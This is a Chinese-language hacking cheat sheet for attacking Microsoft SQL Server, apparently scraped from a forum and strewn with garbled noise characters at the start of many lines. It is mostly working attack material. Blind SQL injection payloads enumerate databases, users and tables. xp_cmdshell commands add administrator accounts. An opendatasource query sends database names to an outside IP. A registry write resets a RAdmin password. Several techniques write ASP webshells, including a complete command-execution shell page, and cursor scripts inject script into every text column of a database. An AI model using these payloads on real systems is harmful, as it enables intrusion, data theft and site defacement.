1 |* Q6 |7 K  N$ v
1 X" h+ x& @' H0 {添加和删除一个SA权限的用户test：
exec master.dbo.sp_addlogin test,9530772
exec master.dbo.sp_addsrvrolemember test,sysadmin

删除扩展存储过过程xp_cmdshell的语句:
exec sp_dropextendedproc 'xp_cmdshell'

添加扩展存储过过程
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
3 I3 @" m- K# h$ h2 kGRANT exec On xp_proxiedadata TO public


停掉或激活某个服务。

4 _  D3 F  O9 W" J, }exec master..xp_servicecontrol 'stop','schedule'
* n9 }% E+ ?% c% G* a$ Y7 Aexec master..xp_servicecontrol 'start','schedule'
" I  T1 J1 U+ s, T
1 Q  H! A6 ^6 }- Qdbo.xp_subdirs
0 H' k& x9 D) C$ u4 T, o; S6 u. o
只列某个目录下的子目录。
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'

7 H$ R5 |2 o) L1 R! \8 s' R* C1 |* C4 Xdbo.xp_makecab

将目标多个档案压缩到某个目标档案之内。
所有要压缩的档案都可以接在参数列的最后方，以逗号隔开。
: h) |( A! Y/ O0 N
/ I, q  h: h$ g& e0 C+ fdbo.xp_makecab
'c:\test.cab','mszip',1,
4 }) D. ?) D8 h'C:\Inetpub\wwwroot\SQLInject\login.asp',
8 z7 ^6 M2 M; o4 B2 ~9 \'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'
2 V! W$ A/ k! m2 X& F# `' {
! J* U1 e7 y$ l4 n7 E3 R6 Jxp_terminate_process

停掉某个执行中的程序，但赋予的参数是 Process ID。
利用”工作管理员”，透过选单「检视」-「选择字段」勾选 pid，就可以看到每个执行程序的 Process ID

xp_terminate_process 2484

' R5 _! A; E% n  r5 pxp_unpackcab
! T. a' h3 t6 o- t
解开压缩档。

6 b" v# }  R/ D! `( E, d7 U+ \xp_unpackcab 'c:\test.cab','c:\temp',1


; `7 R( J* j$ h( U2 Y' N某机，安装了radmin，密码被修改了，regedit.exe不知道被删除了还是被改名了，net.exe不存在，没有办法使用regedit /e 导入注册文件，但是mssql是sa权限，使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
1 I& {, z) F1 L0 {) c) l1 u5 F
create database lcx;
Create TABLE ku(name nvarchar(256) null);
Create TABLE biao(id int NULL,name nvarchar(256) null);
5 E0 h+ l  ]9 `& H) D' u
//得到数据库名
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases

6 D9 j  g9 y7 f/ q
5 h' P: x* d1 i//在Master中创建表，看看权限怎样
. `8 P' u. i0 hCreate TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--

用 sp_makewebtask直接在web目录里写入一句话马：
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--

//更新表内容
Update films SET kind = 'Dramatic' Where id = 123

//删除内容
delete from table_name where Stockid = 3
% ^8 M6 i& g) S
( D3 f  U% v" {
( o& [4 H3 ^" K! ~手工脚本注入
' Z0 E# g" Q1 w! y9 V( z5 K1.判断是否有注入;and 1=1 ;and 1=2
2 |- n- e3 E8 ?2 _: h8 m
) g* V  O1 n! E  o* c2.初步判断是否是mssql ;and user>0
2 {! M% V, u& @- c! @% D
2 |$ c( h  A& ?5 J$ c# ?1 c' J3.注入参数是字符'and [查询条件] and ''='

4.搜索时没过滤参数的'and [查询条件] and '%25'='
' Z: x5 U3 `" \5 J, L5 c
5.判断数据库系统
;and (select count(*) from sysobjects)>0 mssql
/ e- u5 N  y4 C& K8 a  a* O;and (select count(*) from msysobjects)>0 access

  y' v/ B+ `/ f# }6.猜数据库 ;and (select Count(*) from [数据库名])>0
3 }* D$ f& j8 d$ z& N
  C; b: J- }/ |6 o: O; _! l$ H7.猜字段 ;and (select Count(字段名) from 数据库名)>0

8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0
$ T6 ?1 w6 K9 T9 f
4 x" y( t3 f6 S% H, f9 h9.(1)猜字段的ascii值（access）
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0

2 {5 _6 B0 V/ s& g* _5 Y0 H(2)猜字段的ascii值（mssql）
3 a. o! v$ r# a% S* @;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0

10.测试权限结构（mssql）
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
2 @6 \7 ?% R8 E9 A- m3 J, g;and 1=(select IS_SRVROLEMEMBER('serveradmin'));--
; \9 J: c8 H1 S$ E: t;and 1=(select IS_SRVROLEMEMBER('setupadmin'));--
9 }4 h% c/ X3 \! S;and 1=(select IS_SRVROLEMEMBER('securityadmin'));--
% i) N/ Z2 T) w/ G( \& ^6 G;and 1=(select IS_SRVROLEMEMBER('diskadmin'));--
% i! y5 P1 e8 i;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--
;and 1=(select IS_MEMBER('db_owner'));--

11.添加mssql和系统的帐户
;exec master.dbo.sp_addlogin username;--

;exec master.dbo.sp_password null,username,password;--

' W) F" b$ A6 t( c3 k! P;exec master.dbo.sp_addsrvrolemember sysadmin username;--
) n, s1 r! P* E( p3 V' ?8 u: C
;exec master.dbo.xp_cmdshell 'net user username password
* K# e5 P) |! K1 Q! b, O# H/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';--
5 @$ W' p% q4 `; e0 \
: l+ h5 H6 @( K) a;exec master.dbo.xp_cmdshell 'net user username password /add';--
( ]3 M& E* S3 J$ H
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';--
, }1 _  H! m. Q0 b1 t+ ?# \
12.(1)遍历目录
" y. @) D! O" u' E, I- {( J6 ^
;create table dirs(paths varchar(100), id int)
; W/ T9 p" G! \* ^+ Z3 D;insert dirs exec master.dbo.xp_dirtree 'c:\'
;and (select top 1 paths from dirs)>0
) F4 b, j# ]1 q  S3 \0 \/ h;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>)

# K( A+ r" b8 W  K" h$ i(2)遍历目录
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器
! j  Z1 t8 }2 G$ z. q;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表
$ n" f3 W& v! o2 h& Y$ s;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容

13.mssql中的存储过程
6 o, I3 Q* B7 n3 g" C  \, C
xp_regenumvalues 注册表根键, 子键
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值

xp_regread 根键,子键,键值名
;exec xp_regread
6 R. M; x* a5 f& L/ F'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值
/ Y* W* t+ i9 G% L9 z
! G- l, H( f! Y) yxp_regwrite 根键,子键, 值名, 值类型, 值
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表
% k3 r. ~* p' \) R# X8 W% P- Q
xp_regdeletevalue 根键,子键,值名

) p4 e7 j& C2 L8 {2 yexec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值

xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值

14.mssql的backup创建webshell
use model
* O1 ]* W; G* @/ Tcreate table cmd(str image);
insert into cmd(str) values ('');
backup database model to disk='c:\l.asp';
1 k1 Q( v! X* k/ l6 S* o! u
15.mssql内置函数
% `# x9 K+ u  G5 I/ Z; D;and (select @@version)>0 获得Windows的版本号
6 D) a( X- a- _$ N8 A( A) D# E;and user_name()='dbo' 判断当前系统的连接用户是不是sa
+ m" H" \- r( `& Z9 a) };and (select user_name())>0 爆当前系统的连接用户
% b2 B* z# B9 `9 k. v/ ]$ h  |;and (select db_name())>0 得到当前连接的数据库

& p- }/ K7 m( _. g1 f# E7 W% }16.简洁的webshell
) t& L. F: B0 j- ~
* ~/ }- _1 Z$ u. y0 Uuse model

/ g$ S0 J: {. g7 q. b" Pcreate table cmd(str image);

/ T3 V# _& J' L9 Dinsert into cmd(str) values ('');
. g# R) T) ~  @( `
backup database model to disk='g:\wwwtest\l.asp';
$ \. F6 d6 b' |0 w

! R# C0 i1 g% j: o% _/ ]
8 N8 [3 U* D6 B9 [8 K+ h
; C6 Q6 b- y! M                                                                                  (3)
% j4 {' f. a  d* o                                                                                 

可能有很多人，看到关闭了wscript.shell,就感觉没提权的希望了。就会放弃。
; O1 K7 Y5 ?9 D" g6 j一般当闭上面组件时，你上传cmd.exe到上面去是运行不了命令的。运行时会说出错。
要想让运行命令可以试试这种方法，成功率为五五之数。
把下面代码复制：
/ B9 f% P: f, `' z<object runat=server id=oScriptlhn scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object>
<%if err then%>
9 W1 Q$ ]0 E6 t" i! n<object runat=server id=oScriptlhn scope=page classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></object>
<%
end if
5 _- ?/ a" D: v0 r2 O5 y6 mresponse.write("<textarea readonly cols=80 rows=20>")
1 V3 O0 A* X* KOn Error Resume Next
response.write oScriptlhn.exec("cmd.exe /c" & request("c")).stdout.readall
response.write("</textarea>")
4 |3 R+ X) H! X2 l. I" [0 eresponse.write("<form method='post'>")
1 G9 N+ n/ L% D5 B% Oresponse.write("<input type=text name='c' size=60><br>")
response.write("<input type=submit value='执行'></form>")
%>
6 O' [* p* @, ?9 a- y6 w, i
保存为一个asp文件，然后传到网站目录上去
/ h2 _4 J3 ?6 j运行的时候可能会出现两个问题，第一是运行了为什么运行不了命令，这个你可以试着再上传个cmd.exe然后把路径写入上面代码。
0 M9 u$ y; _6 @0 N% a* s3 m$ I( B我用此成功运行过cacls命令。

9 ^1 l1 k4 t2 r0 [# l第二那就是运行时出错，可能限制某些代码执行
. u& o! Z2 R9 D4 M3 B8 ^
- i5 P2 y1 n( T. Q  N# @
                                                                                     (4)

+ B  N" F! Q% t9 r: u4 Z
◆获取数据库名
( h+ z- y& P: j- K* ^ and db_name()=0
and db_name(0)=0
and db_name(__i__)=0
and quotename(db_name(__i__))=0
/ \5 Q" @# c# [5 D2 w. {
◆获取用户名
: v% H2 |6 a: `4 i) @ and user=0

/ R6 Y4 D9 i; }. |3 R  Q◆获取版本信息
and @@version=0
5 q& m( d* |4 E7 O$ d
2 V7 F. j6 n2 A  Z. g$ g9 E◆获取服务器名
and @@servername=0
- S2 H2 a6 J, ]& w- F5 ?  B
◆获取服务名
and @@servicename=0
3 D6 j# b7 Y, d# i- A
◆获取系统用户名
and system_user=0

◆一次性获取所有基本信息
6 p/ E1 `, A0 S. G, q- J  Q7 G& C AnD (dB_NaMe(0)+cHaR(124)+uSeR+cHaR(124)+@@vErSiOn+cHaR(124)+@@sErVeRnAmE+cHaR(124)+@@sErViCeNaMe+cHaR(124)+sYsTeM_UsEr)=0
, _7 s  S5 T+ Y- f1 ?( G8 ^
◆一次性探测权限
AnD (cAsT(iS_srvrOlEmEmBeR(0x730079007300610064006d0069006e00)aS vArChAr)+cHaR(94)+cAsT(iS_srvrOlEmEmBeR(0x64006200630072006500610074006f007200)aS vArChAr)+cHaR(94)+cAsT(iS_srvrOlEmEmBeR(0x620075006c006b00610064006d0069006e00)aS vArChAr)+cHaR(94)+cAsT(iS_srvrOlEmEmBeR(0x6400690073006b00610064006d0069006e00)aS vArChAr)+cHaR(94)+cAsT(iS_srvrOlEmEmBeR(0x730065007200760065007200610064006d0069006e00)aS vArChAr)+cHaR(94)+cAsT(iS_mEmBeR (0x7000750062006c0069006300) aS vArChAr)+cHaR(94)+cAsT(iS_mEmBeR (0x640062005f006f0077006e0065007200) aS vArChAr)+cHaR(94)+cAsT(iS_mEmBeR (0x640062005f006200610063006b00750070006f00700065007200610074006f007200) aS vArChAr)+cHaR(94)+cAsT(iS_mEmBeR (0x640062005f006400610074006100770072006900740065007200) aS vArChAr))=0

0 D  c: O0 N5 ^" Z. I◆获取数据库的数目
AnD (sElEcT cAsT(cOuNt(1) aS nvArChAr(100))+cHaR(9) FrOm mAsTeR..sYsDaTaBaSeS)=0

, a! Q* p9 A. O& ]" b; [- j◆获取数据库文件名
- N2 K* w$ V; q" |4 h. V5 i1 b and (select top 1 filename from (select top __i__ filename from master..sysdatabases order by filename) t order by filename desc)=0
( m( _( |3 k% _$ x+ |; R( M) A( Y) @8 O
7 g4 ?! E- }3 k( ]6 B& @◆同时获取数据库名和数据库文件名
0 p* `; h2 k3 S, A7 p AnD (sElEcT ToP 1 rtrim(iSnUlL(cAsT(nAmE aS nvArChAr(4000)),cHaR(32)))+cHaR(9)+rtrim(iSnUlL(cAsT(filenAmE aS nvArChAr(4000)),cHaR(32)))+cHaR(9) FrOm (sElEcT ToP __i__ nAmE,filenAmE FrOm mAsTeR..sYsDaTaBaSeS oRdEr bY nAmE) t oRdEr bY nAmE dEsC)=0
8 v# m6 @  T5 Y* J( s. X
◆获取数据库的表的数目
  and (select cast(count(1) as varchar)+char(9) from <数据库名>..sysobjects where xtype=0x75)=0
/ d8 b! S' u: o. W9 t2 r8 x% e" F# x5 Q
2 {3 `7 u9 s) n- S5 M$ c◆获取数据库的表
and (select top 1 name from (select top __i__ name from <数据库名>..sysobjects where xtype=0X75 order by name) t order by name desc)=0
and (select top 1 quotename(name) from <数据库名>.dbo.sysobjects where xtype=char(85) AND name not in (select top __i__ name from <数据库名>.dbo.sysobjects where xtype=char(85)))=0
! l, {) n; v% c2 ^
◆获取表的字段的数目
% @, B( B; X9 T3 G and (select cast(count(1) as varchar)+char(9) from <数据库名>..syscolumns where id=object_id('<表名>'))=0
( z- `2 O2 U7 `; n- k
4 b$ r0 W6 `7 u+ S  }2 k◆获取数据库表的字段
+ F7 l' t" _; s) ^' y- v and (select top 1 name from (select top __i__ name,id from <数据库名>..syscolumns where id=object_id('<表名>') order by name) t order by name desc)=0
. w$ s& ?" A! f- b and (select col_name(object_id('<表名>'),__i__))=0

, g8 X# b+ c9 d9 \◆获取满足条件的表的记录数
2 |+ J& L* Z0 R# r AnD (sElEcT cAsT(cOuNt(1) aS nvArChAr(100))+cHaR(9) FrOm <数据库名>..<表名>)=0
* z* t! x. X( u$ R) s4 p, o
◆获取数据库的内容
& y' s6 C* v- R AnD (sElEcT ToP 1 rtrim(iSnUlL(cAsT(<列名1> aS nvArChAr(4000)),cHaR(32)))+cHaR(9)+rtrim(iSnUlL(cAsT(<列名2> aS nvArChAr(4000)),cHaR(32)))+cHaR(9)+rtrim(iSnUlL(cAsT(<列名3> aS nvArChAr(4000)),cHaR(32)))+cHaR(9) FrOm (sElEcT ToP __i__ <列名1>,<列名2>,<列名3> FrOm <数据库名>..<表名> oRdEr bY <排序列名>) t oRdEr bY <排序列名> dEsC)=0
+ S) }$ p  u4 B. V- Q% N5 Q9 Z+ D

; w# s! U' f' \* M◆基于日志差异备份
--1. 进行初始备份
; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<临时文件名:e:\wwwroot\m.asp>' With Init--

1 b1 ^5 ?$ O5 Y1 M--2. 插入数据
: g. t- v, W, S6 F5 v;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
: n6 R6 r% H3 F2 s4 t% q6 P
" f# }* s8 n- Q; r--3. 备份并获得文件，删除临时表
;Backup Log <数据库名> To Disk = '<要生成的文件名:e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--
! j  I" N9 I! y, _3 I4 _3 d  ^2 l% C
◆基于数据库差异备份
3 E% e, s% [; a' S  B6 l7 ]- P1. 进行差异备份准备工作
% }6 I" H' H1 F;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<临时文件名:0x633A5C617364662E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--
+ ?) o- X- d6 W" k0 ^
2. 将数据写入到数据库
  H9 C* U9 J. y) E7 @;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
6 G2 H8 g: P6 d
& D8 K- o! e0 \% p$ f  M1 l! Y& q# T3. 备份数据库并作最后的清理工作
* H" T" W3 t( p" m5 Z;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<最终需要备份出的文件名:0x633A5C617364662E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--
* S$ H6 g* j- J+ q4 g
◆数据库插马(插指定数据库的指定表的满足条件的记录)
;update <数据库名>..<表名> set <字段名>=<字段名>+'<script>alert("有漏洞啊。")</script>' where <要满足的条件>--
/ U" U% C# v9 H$ v
◆数据库批量插马(插所有可插入的字段和记录，危险！！请谨慎操作！！)
7 [- B6 m" n8 m6 k;dEcLaRe @t vArChAr(255),@c vArChAr(255) dEcLaRe tAbLe_cursoR cUrSoR FoR sElEcT a.nAmE,b.nAmE FrOm sYsObJeCtS a,sYsCoLuMnS b wHeRe a.iD=b.iD AnD a.xTyPe='u' AnD (b.xTyPe=99 oR b.xTyPe=35 oR b.xTyPe=231 oR b.xTyPe=167) oPeN tAbLe_cursoR fEtCh next FrOm tAbLe_cursoR iNtO @t,@c while(@@fEtCh_status=0) bEgIn exec('UpDaTe ['+@t+'] sEt ['+@c+']=rtrim(convert(varchar,['+@c+']))+cAsT(<要插入的内容(0x编码形式)> aS vArChAr(200<此处长度应做相应修改>))') fEtCh next FrOm tAbLe_cursoR iNtO @t,@c eNd cLoSe tAbLe_cursoR dEAlLoCaTe tAbLe_cursoR;--

7 l# X* b! v1 o
, w4 z6 \4 K; E9 f7 I4 ?;DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,s yscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<要插入的内容>''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor--
4 a- J: B4 }+ B
◆执行命令行(无结果返回)
;exec master..xp_cmdshell 'net user name password /add & net localgroup administrators name /add'--
8 l5 O) V( h$ u' ]' P, h. @' T
3 ^% G- I, X" Z% z  w◆恢复存储过程 xp_cmdshell
/ f; ]" J. M+ q/ p;Exec Master..sp_dropextendedproc 0x780070005F0063006D0064007300680065006C006C00;Exec Master..sp_addextendedproc 0x780070005F0063006D0064007300680065006C006C00,0x78706C6F6737302E646C6C--

◆SQLServer 2005 开启和关闭 xp_cmdshell
;EXEC master..sp_configure 'show advanced options',1;RECONFIGURE;EXEC master..sp_configure 'xp_cmdshell',1;RECONFIGURE;
) V8 b. a' ~$ M2 P
0 y  k, ^5 G1 c* x/ j% u: g关闭 xp_cmdshell
6 {: w& p& g! \7 e* D. c& s' e;EXEC master..sp_configure 'show advanced options',1;RECONFIGURE;EXEC master..sp_configure 'xp_cmdshell',0;RECONFIGURE;

◆SQLServer 2005 开启和关闭 OpenDataSource/OpenRowSet
开启：
;EXEC master..sp_configure 'show advanced options',1;RECONFIGURE;EXEC master..sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;
7 j6 F! V9 O, C6 Y& _关闭：
;EXEC master..sp_configure 'show advanced options',1;RECONFIGURE;EXEC master..sp_configure 'Ad Hoc Distributed Queries',0;RECONFIGURE;
! I* |: x6 s* H& L
0 L; m* n! Y* n* f◆SQLServer 2005 日志差异备份

% i) \8 E0 u$ G- O+ Y/ {5 Ralter database [testdb] set recovery full
6 H2 o2 ]% |- l( K. w; g! fdeclare @d nvarchar(4000) set @d=0x640062006200610063006B00 backup database __dbname__ to disk=@d with init--

! W+ z1 O* v- e7 O" Odrop table [itpro]--
create table [itpro]([a] image)--
$ }& j* A0 U8 s. W  edeclare @d nvarchar(4000) set @d=0x640062006200610063006B00 backup log __dbname__ to disk=@d with init--

- K7 n: w7 L2 ^. m' p! `" Xinsert into [itpro]([a]) values(__varchar(木马内容))--
declare @d nvarchar(4000) set @d=__nvarchar(文件名) backup log __dbname__ to disk=@d with init--
2 J7 \% x! [% j$ @6 c1 m
drop table [itpro] declare @d nvarchar(4000) set @d=0x640062006200610063006B00 backup log __dbname__ to disk=@d with init--

* H+ \6 {& w  G* k% l

2 e3 @4 a( _# \7 r
( D) c4 j3 P" l+ c: {